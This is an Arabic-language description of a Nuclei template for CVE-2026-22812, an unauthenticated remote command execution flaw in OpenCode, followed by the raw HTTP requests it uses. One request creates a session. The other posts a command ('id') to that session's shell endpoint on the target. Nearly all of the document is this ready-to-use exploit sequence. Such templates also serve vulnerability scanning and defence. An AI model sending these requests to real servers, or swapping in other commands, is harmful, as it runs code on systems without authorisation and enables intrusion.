
قالب Nuclei لاكتشاف واستغلال تنفيذ الأوامر عن بُعد غير المُصادق عليه في OpenCode عبر طلبات HTTP مُصمّمة بعناية.
CVE-2026-22812 - قالب Nuclei لاستغلال ثغرة RCE غير المصادق عليها في OpenCode للمسح الضوئي.
POST /session HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Content-Type: application/json
Content-Length: 2
{}
POST /session/"id"/shell HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Content-Type: application/json
Content-Length: 44
{
"agent": "build",
"command": "id"
}